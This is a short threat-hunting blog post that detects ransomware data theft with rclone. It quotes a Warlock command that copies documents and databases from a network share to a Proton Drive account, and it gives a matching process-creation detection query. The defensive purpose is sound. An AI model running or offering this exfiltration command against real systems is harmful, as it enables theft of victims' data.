233. Another Tool - Same Detecton Opportunity

Hello everyone!

Yesterday we looked at how Qilin ransomware gang abused s5cmd to exfiltrate sensitive data from compromised systems. Today we'll look at abother example to understand that the same detections may be applied to various cases.

This time we'll look at another very popular tool for data exfiltration - rclone. Here's how Warlock used this tool:

TrendSecurity[.]exe copy \\{UNC Path}\ mydrive:/client_42 --protondrive-username [Email] --protondrive-password [Password] -P --include "*.{txt,pdf,csv,accdb,doc,docx,xlsx,mdf,sql,doc,xls,sql,jpg,png,jpeg,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 200d --max-size 3000m

As you can see, here we have very similar command line arguments, so we can use the same query:

event_type: "processcreatewin"

AND

cmdline: ("include" AND "pdf" AND "xls" AND "doc")

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge